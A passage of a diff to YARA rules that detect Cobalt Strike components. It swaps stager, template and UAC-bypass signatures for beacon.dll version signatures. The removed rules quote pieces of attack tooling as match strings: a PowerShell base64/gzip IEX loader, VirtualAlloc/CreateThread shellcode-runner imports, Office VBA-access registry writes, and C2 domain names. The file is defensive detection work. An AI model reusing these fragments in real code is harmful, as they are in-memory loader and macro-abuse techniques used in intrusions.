"https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L691-L731" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9" - logic_hash = "50d9da466e2c074b3fb634203c8840d45da8f8e3094790d7c4354a5703b583ef" + hash = "67b6557f614af118a4c409c992c0d9a0cc800025f77861ecf1f3bbc7c293d603" + logic_hash = "a0c78dd7cda055bc76a8661b0416a302d7b05d03eeea483d2d1695093cd6dc90" score = 75 quality = 85 tags = "" strings: - $core_sig = { - 33 C0 - 83 F8 01 - 74 63 - 48 8B 44 24 20 - 0F B7 00 - 3D 4D 5A 00 00 - 75 45 - 48 8B 44 24 20 - 48 63 40 3C - 48 89 44 24 28 - 48 83 7C 24 28 40 - 72 2F - 48 81 7C 24 28 00 04 00 00 - 73 24 - 48 8B 44 24 20 - 48 8B 4C 24 28 - 48 03 C8 - 48 8B C1 - 48 89 44 24 28 - 48 8B 44 24 28 - 81 38 50 45 00 00 - 75 02 - } - $deobfuscator = { - 8B 04 24 - FF C0 - 89 04 24 - 8B 44 24 28 - 39 04 24 - 73 20 - 8B 04 24 - 0F B6 4C 24 30 - 48 8B 54 24 20 - 0F BE 04 02 - 33 C1 - 8B 0C 24 - 48 8B 54 24 20 - 88 04 0A - } + $version_sig = { 48 57 8B F9 83 F8 4B 0F 87 5D 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $xmrig_srcpath = "C:/Users/SKOL-NOTE/Desktop/Loader/script.go" + $c2_1 = "ns7.softline.top" xor + $c2_2 = "ns8.softline.top" xor + $c2_3 = "ns9.softline.top" xor condition: - $core_sig and not $deobfuscator + $version_sig and $decoder and not (2 of ($c2_*) or $xmrig_srcpath) } -rule GCTI_Cobaltstrike_Resources_Browserpivot_X64_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_X64_Dll_V4_0_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11 { meta: - description = "Cobalt Strike's resources/browserpivot.x64.bin from v1.48 to v3.14 and sleeve/browserpivot.x64.dll from v4.0 to at least v4.4" + description = "Cobalt Strike's resources/beacon.dll Versions 3.11" author = "gssincla@google.com" - id = "a5dfae85-ff9c-5ca5-9ac0-041c6108a6ed" + id = "00e42396-db81-5d43-90ee-5a97b379019e" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_x64_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_x64_Dll_v4_0_to_v4_x.yara#L17-L64" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L739-L770" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "0ad32bc4fbf3189e897805cec0acd68326d9c6f714c543bafb9bc40f7ac63f55" - logic_hash = "a59f19b6e258b724ed88b4255717d066319ba5fb0838d6c6ed11355e9d9b1c22" + hash = "2428b93464585229fd234677627431cae09cfaeb1362fe4f648b8bee59d68f29" + logic_hash = "24ca0a9c2249d1872a53dc228234bdc6803bdfe9e80847995e0951184a8d935c" score = 75 quality = 85 tags = "" strings: - $socket_recv = { - FF 15 [4] - 83 ?? FF - 74 ?? - 85 ?? - 74 ?? - 03 ?? - 83 ?? 02 - 72 ?? - 8D ?? FF - 80 [2] 0A - 75 ?? - 8D ?? FE - 80 [2] 0D - } - $fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]" + $version_sig = { 48 57 8B FA 83 F8 50 0F 87 11 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Covertvpn_Injector_Exe_V1_44_To_V2_0_49 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_11_Bugfix_And_V3_12 { meta: - description = "Cobalt Strike's resources/covertvpn-injector.exe signature for version v1.44 to v2.0.49" + description = "Cobalt Strike's resources/beacon.dll Versions 3.11-bugfix and 3.12" author = "gssincla@google.com" - id = "48485ae2-1d99-5fa8-b8e8-0047e92ef447" + id = "08ff2a2f-97bd-5839-b414-d67fbf2cdb0f" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_injector_Exe_v1_44_to_v2_0_49.yara#L17-L116" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L772-L804" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "d741751520f46602f5a57d1ed49feaa5789115aeeba7fa4fc7cbb534ee335462" - logic_hash = "119602efe6243d8c0dc7b8f4468eb9b3be292620920f69dc8a560f900ac7f622" + hash = "5912c96fffeabb2c5c5cdd4387cfbfafad5f2e995f310ace76ca3643b866e3aa" + logic_hash = "566eb14f918ad422d5a273390263e63ac37b00cd10ac3561e038fb1a27f85d80" score = 75 quality = 85 tags = "" + rs2 = "4476a93abe48b7481c7b13dc912090b9476a2cdf46a1c4287b253098e3523192" strings: - $dropComponentsAndActivateDriver_prologue = { - C7 04 24 [4] - E8 [4] - 83 EC 04 - C7 44 24 04 [4] - 89 04 24 - E8 59 14 00 00 - 83 EC 08 - 89 45 ?? - 83 7D ?? 00 - 74 ?? - E8 [4] - 8D [2] - 89 [3] - 89 04 24 - } - $dropFile = { - C7 44 24 04 00 00 00 00 - 8B [2] - 89 ?? 24 - E8 [4] - 83 F8 FF - 74 ?? - 8B [2] - 89 ?? 24 04 - C7 04 24 [4] - E8 [4] - E9 [4] - C7 44 24 18 00 00 00 00 - C7 44 24 14 80 01 00 00 - C7 44 24 10 02 00 00 00 - C7 44 24 0C 00 00 00 00 - C7 44 24 08 05 00 00 00 - C7 44 24 04 00 00 00 40 - 8B [2] - 89 04 24 - E8 [4] - 83 EC 1C - 89 45 ?? - } - $nfp = "npf.sys" nocase - $wpcap = "wpcap.dll" nocase + $version_sig = { 48 57 8B FA 83 F8 50 0F 87 0D 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Smbstager_Bin_V2_5_Through_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_13 { meta: - description = "Cobalt Strike's resources/smbstager.bin signature for versions 2.5 to 4.x" + description = "Cobalt Strike's resources/beacon.dll Versions 3.13" author = "gssincla@google.com" - id = "074b7d83-e3d8-541c-804b-2417c21f54d5" + id = "98dd32e6-9bb5-57b2-a5e5-1c74a0d1e6d3" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Smbstager_Bin_v2_5_through_v4_x.yara#L17-L95" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L806-L836" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c" - logic_hash = "b0f6535069df16a64de44ca0638ec060c1ff264a7820c94710d61ca7e8474450" + hash = "362119e3bce42e91cba662ea80f1a7957a5c2b1e92075a28352542f31ac46a0c" + logic_hash = "adafac8692ad676b0168b3e829bc7948db72953b95c79d483ae1a05f1d4f9b2b" score = 75 quality = 85 tags = "" strings: - $apiLocator = { - 31 ?? - AC - C1 ?? 0D - 01 ?? - 38 ?? - 75 ?? - 03 [2] - 3B [2] - 75 ?? - 5? - 8B ?? 24 - 01 ?? - 66 8B [2] - 8B ?? 1C - 01 ?? - 8B ?? 8B - 01 ?? - 89 [3] - 5? - 5? - } - $smb = { 68 C6 96 87 52 } - $smbstart = { - 6A 40 - 68 00 10 00 00 - 68 FF FF 07 00 - 6A 00 - 68 58 A4 53 E5 - } + $version_sig = { 4A 56 57 83 FA 5A 0F 87 2D 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: - $apiLocator and $smb and $smbstart + all of them } -rule GCTI_Cobaltstrike_Resources_Httpstager_Bin_V2_5_Through_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_14 { meta: - description = "Cobalt Strike's resources/httpstager.bin signature for versions 2.5 to 4.x" + description = "Cobalt Strike's resources/beacon.dll Versions 3.14" author = "gssincla@google.com" - id = "86109485-c26c-5c51-8d04-dd1add9a8c57" + id = "00edfc72-c7b8-5100-8275-ae3548b96e49" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager_Bin_v2_5_through_v4_x.yara#L17-L93" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L838-L866" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "a47569af239af092880751d5e7b68d0d8636d9f678f749056e702c9b063df256" - logic_hash = "3baab08b0118e00432f1869ba5daa4fc6383bfc020119bfbb3047a008c33fe72" + hash = "254c68a92a7108e8c411c7b5b87a2f14654cd9f1324b344f036f6d3b6c7accda" + logic_hash = "6faed2b69647b87d86d46ae73ad92cfe7b2746c306cd7480dc9f0c484c8882e2" score = 75 quality = 85 tags = "" + rs2 = "87b3eb55a346b52fb42b140c03ac93fc82f5a7f80697801d3f05aea1ad236730" strings: - $apiLocator = { - 31 ?? - AC - C1 ?? 0D - 01 ?? - 38 ?? - 75 ?? - 03 [2] - 3B [2] - 75 ?? - 5? - 8B ?? 24 - 01 ?? - 66 8B [2] - 8B ?? 1C - 01 ?? - 8B ?? 8B - 01 ?? - 89 [3] - 5? - 5? - } - $downloaderLoop = { - B? 00 2F 00 00 - 39 ?? - 74 ?? - 31 ?? - ( E9 | EB ) - } + $version_sig = { 83 FA 5B 77 15 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: - $apiLocator and $downloaderLoop + all of them } -rule GCTI_Cobaltstrike_Resources_Command_Ps1_V2_5_To_V3_7_And_Resources_Compress_Ps1_V3_8_To_V4_X +rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_0_Suspected { meta: - description = "Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x" + description = "Cobalt Strike's sleeve/beacon.dll Versions 4.0 (suspected, not confirmed)" author = "gssincla@google.com" - id = "c0b81deb-ed20-5f7e-8e15-e6a9e9362594" + id = "50ff6e44-ebc0-5000-a816-b385a6675768" date = "2022-11-18" - modified = "2022-11-22" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x.yara#L17-L33" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L868-L901" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62" - logic_hash = "31cf47060757b086d325cd205724a7be8931bbbc6ff2f4be67a6179ee99c42ca" + hash = "e2b2b72454776531bbc6a4a5dd579404250901557f887a6bccaee287ac71b248" + logic_hash = "6875099bc6df26f829f9f64e70bd7fdac6ac7b83a5596fc9359c127fef4e6db5" score = 75 quality = 85 tags = "" strings: - $ps1 = "$s=New-Object \x49O.MemoryStream(,[Convert]::\x46romBase64String(" nocase - $ps2 = "));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" nocase + $version_sig = { 51 4A 56 57 83 FA 62 0F 87 8F 03 00 00 FF 24 95 56 7B 00 10 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Elevate_X64_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_X64_Dll_V4_X +rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_1_And_V4_2 { meta: - description = "Cobalt Strike's resources/elevate.x64.dll signature for v3.0 to v3.14 and sleeve/elevate.x64.dll for v4.x" + description = "Cobalt Strike's sleeve/beacon.dll Versions 4.1 and 4.2" author = "gssincla@google.com" - id = "91d5c343-1084-5cfc-9dfa-46f530eb9625" + id = "793df916-bdf7-5743-b008-0113caf38bae" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_X64_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_X64_Dll_v4_x.yara#L17-L71" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L903-L934" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "c3ee8a9181fed39cec3bd645b32b611ce98d2e84c5a9eff31a8acfd9c26410ec" - logic_hash = "6f23bcf6a0c360d2f83140ce633440b13d8b691e75c5560c65656cf8a6114224" + hash = "daa42f4380cccf8729129768f3588bb98e4833b0c40ad0620bb575b5674d5fc3" + logic_hash = "7280a5c3f478ea40b6b72fb4669d5b8c21603e7fbfbc3815a83bc462ee19c0f5" score = 75 quality = 85 tags = "" + rs2 = "9de55f27224a4ddb6b2643224a5da9478999c7b2dea3a3d6b3e1808148012bcf" strings: - $wnd_proc = { - 81 ?? 21 01 00 00 - 75 ?? - 83 [5] 00 - 75 ?? - 45 33 ?? - 8D [2] - C7 [5] 01 00 00 00 - 45 [2] 28 - FF 15 [4] - 45 33 ?? - 8D [2] - 45 [2] 27 - 48 [2] - FF 15 [4] - 45 33 ?? - 45 33 ?? - BA 01 02 00 00 - 48 - } + $version_sig = { 48 57 8B F2 83 F8 63 0F 87 3C 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: - $wnd_proc + all of them } -rule GCTI_Cobaltstrike_Resources_Template__X32_X64_Ps1_V1_45_To_V2_5_And_V3_11_To_V3_14 +rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's resources/template.x64.ps1, resources/template.x32 from v3.11 to v3.14 and resources/template.ps1 from v1.45 to v2.5 " + description = "Cobalt Strike's sleeve/beacon.dll Versions 4.3 and 4.4" author = "gssincla@google.com" - id = "c9fa6a39-0098-5dde-9762-94bc6b2df299" + id = "976e087c-f371-5fc6-85f8-9c803a91f549" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template__x32_x64_Ps1_v1_45_to_v2_5_and_v3_11_to_v3_14.yara#L17-L43" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L936-L967" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87" - logic_hash = "5196f111f257239d2e7e4ca342e7fc8bac1687743bc8c7ff23addf1f094b2e93" + hash = "51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f" + logic_hash = "6608a84c4fd3bf77fd5b426da8be250d8b99878bd746fa23789f4791a164ce33" score = 75 quality = 85 tags = "" + rs2 = "78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc" strings: - $importVA = "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc" nocase - $importCT = "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread" nocase - $importWFSO = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject" nocase - $compiler = "New-Object Microsoft.CSharp.CSharpCodeProvider" nocase - $params = "New-Object System.CodeDom.Compiler.CompilerParameters" nocase - $paramsSys32 = ".ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" nocase - $paramsGIM = ".GenerateInMemory = $True" nocase - $result = "$compiler.CompileAssemblyFromSource($params, $assembly)" nocase + $version_sig = { 48 57 8B F2 83 F8 65 0F 87 47 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources__Template_Vbs_V3_3_To_V4_X +rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_V4_7_Suspected { meta: - description = "Cobalt Strike's resources/btemplate.vbs signature for versions v3.3 to v4.x" + description = "Cobalt Strike's sleeve/beacon.dll Versions 4.7 (suspected, not confirmed)" author = "gssincla@google.com" - id = "62f35d02-1e4e-5651-b575-888ce06b8bdd" + id = "4b6f90dd-69f3-5555-9195-6a0aed0fff58" date = "2022-11-18" - modified = "2022-11-22" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Vbs_v3_3_to_v4_x.yara#L17-L41" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L969-L1002" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "e0683f953062e63b2aabad7bc6d76a78748504b114329ef8e2ece808b3294135" - logic_hash = "c9df0e287eb0eacf7c6cfcf3f6d1043ae6f2fdacd3b22bd42ac71f4b0d7226ff" + hash = "da9e91b3d8df3d53425dd298778782be3bdcda40037bd5c92928395153160549" + logic_hash = "297ff7c3acfe6f9676dc6c265c548f017f39ccc5217617344e3bccc704ac4c78" score = 75 - quality = 83 + quality = 85 tags = "" strings: - $ea = "Excel.Application" nocase - $vis = "Visible = False" nocase - $wsc = "Wscript.Shell" nocase - $regkey1 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" nocase - $regkey2 = "\\Excel\\Security\\AccessVBOM" nocase - $regwrite = ".RegWrite" nocase - $dw = "REG_DWORD" - $code = ".CodeModule.AddFromString" - $ao = { 41 75 74 6f 5f 4f 70 65 6e } - $da = ".DisplayAlerts" + $version_sig = { 53 56 48 57 8B F2 83 F8 67 0F 87 5E 03 00 00 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Bypassuactoken_X64_Dll_V3_11_To_V3_14 +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_2 { meta: - description = "Cobalt Strike's resources/bypassuactoken.x64.dll from v3.11 to v3.14 (64-bit version)" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.2" author = "gssincla@google.com" - id = "c89befcd-a622-5947-9ce3-a6031901a45a" + id = "61188243-0b90-5bff-bcc8-50f10ed941f6" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_x64_Dll_v3_11_to_v3_14.yara#L17-L118" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1029-L1068" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "853068822bbc6b1305b2a9780cf1034f5d9d7127001351a6917f9dbb42f30d67" - logic_hash = "adfd212f2e470f666ab8a2168e976c11d3032c31dab7cf56963dae5fc0f6c5f9" + hash = "5993a027f301f37f3236551e6ded520e96872723a91042bfc54775dcb34c94a1" + logic_hash = "3803aaac537aec0b188870177e510a3789a71c19be576569b59aa146b2ba62c5" score = 75 quality = 85 tags = "" strings: - $isHighIntegrityProcess = { - 83 ?? 7A - 75 ?? - 8B [3] - 33 ?? - FF 15 [4] - 44 [4] - 8D [2] - 48 8B ?? - 48 8D [3] - 48 8B ?? - 4C 8B ?? - 48 89 [3] - FF 15 [4] - 85 C0 - 74 ?? - 48 8B ?? - FF 15 [4] - 8D [2] - 8A ?? - 40 [2] - 0F B6 D1 - 48 8B 0F - FF 15 [4] - 81 ?? 00 30 00 00 - } - $executeTaskmgr = { - 44 8D ?? 70 - 48 8D [3] - E8 [4] - 83 [3] 00 - 48 8D [5] - 0F 57 ?? - 66 0F 7F [3] - 48 89 [3] - 48 8D [5] - 48 8D [3] - C7 [3] 70 00 00 00 - C7 [3] 40 00 00 00 - 48 89 [3] - FF 15 - } + $version_sig = { 4C 8D 05 9F F8 FF FF 8B D3 48 8B CF E8 05 1A 00 00 + EB 0A 8B D3 48 8B CF E8 41 21 00 00 48 8B 5C 24 30 + 48 83 C4 20 } + $decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Template_X64_Ps1_V3_0_To_V4_X_Excluding_3_12_3_13 +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_3 { meta: - description = "Cobalt Strike's resources/template.x64.ps1, resources/template.hint.x64.ps1 and resources/template.hint.x32.ps1 from v3.0 to v4.x except 3.12 and 3.13" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.3" author = "gssincla@google.com" - id = "5a808113-aacb-56ca-b3ec-166c73c54b85" + id = "fb96ecff-809e-5704-974e-a2d8ef022daa" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x64_Ps1_v3_0_to_v4_x_excluding_3_12_3_13.yara#L17-L37" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1070-L1109" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87" - logic_hash = "80823b8590004686ebd83958cad16094ea2f6958a837d87934507531a00df77a" + hash = "7b00721efeff6ed94ab108477d57b03022692e288cc5814feb5e9d83e3788580" + logic_hash = "514d491b8066ed7127ebb152a27efbe65e1121da3b5460afe6987920a91f2863" score = 75 - quality = 81 + quality = 85 tags = "" strings: - $dda = "[AppDomain]::CurrentDomain.DefineDynamicAssembly" nocase - $imm = "InMemoryModule" nocase - $mdt = "MyDelegateType" nocase - $rd = "New-Object System.Reflection.AssemblyName('ReflectedDelegate')" nocase - $data = "[Byte[]]$var_code = [System.Convert]::FromBase64String(" nocase - $64bitSpecific = "[IntPtr]::size -eq 8" - $mandatory = "Mandatory = $True" + $version_sig = { 8B D3 48 8B CF E8 89 66 00 00 E9 23 FB FF FF + 41 B8 01 00 00 00 E9 F3 FD FF FF 48 8D 0D 2A F8 FF FF + E8 8D 2B 00 00 48 8B 5C 24 30 48 83 C4 20 } + $decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Template_Sct_V3_3_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_4 { meta: - description = "Cobalt Strike's resources/template.sct signature for versions v3.3 to v4.x" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.4" author = "gssincla@google.com" - id = "9d2b1dfa-5f76-503f-9198-6ed0d039e0cb" + id = "97ef152c-86c7-513c-a881-e7d594d38dcf" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Sct_v3_3_to_v4_x.yara#L17-L38" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1111-L1148" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142" - logic_hash = "8868445ced4945c469764b7f311d6cb11c99cf0f2d770113e5e617e0187a962c" + hash = "5a4d48c2eda8cda79dc130f8306699c8203e026533ce5691bf90363473733bf0" + logic_hash = "65aa42265133038f6f568c021c0228440e84e236829af50796a73f6923f46395" score = 75 quality = 85 tags = "" strings: - $scriptletstart = "<scriptlet>" nocase - $registration = "<registration progid=" nocase - $classid = "classid=" nocase - $scriptlang = "<script language=\"vbscript\">" nocase - $cdata = "<![CDATA[" - $scriptend = "</script>" nocase - $antiregistration = "</registration>" nocase - $scriptletend = "</scriptlet>" + $version_sig = { 8B D3 48 8B CF E8 56 6F 00 00 E9 17 FB FF FF + 41 B8 01 00 00 00 8B D3 48 8B CF E8 41 4D 00 00 + 48 8B 5C 24 30 48 83 C4 20 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: - all of them and @scriptletstart[1]<@registration[1] and @registration[1]<@classid[1] and @classid[1]<@scriptlang[1] and @scriptlang[1]<@cdata[1] + all of them } -rule GCTI_Cobaltstrike_Resources_Bypassuac_X64_Dll_V3_3_To_V3_14_And_Sleeve_Bypassuac_X64_Dll_V4_0_And_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_5_Hf1_And_V3_5_1 { meta: - description = "Cobalt Strike's resources/bypassuac-x64.dll from v3.3 to v3.14 (64-bit version) and sleeve/bypassuac.x64.dll from v4.0 to at least v4.4" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.5-hf1 and 3.5.1" author = "gssincla@google.com" - id = "eef83901-63d9-55a3-b115-03f420416177" + id = "0c0e87d3-e0e2-5ddc-9d89-5e56443da4b8" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_x64_Dll_v3_3_to_v3_14_and_Sleeve_Bypassuac_x64_Dll_v4_0_and_v4_x.yara#L17-L86" + source_url = 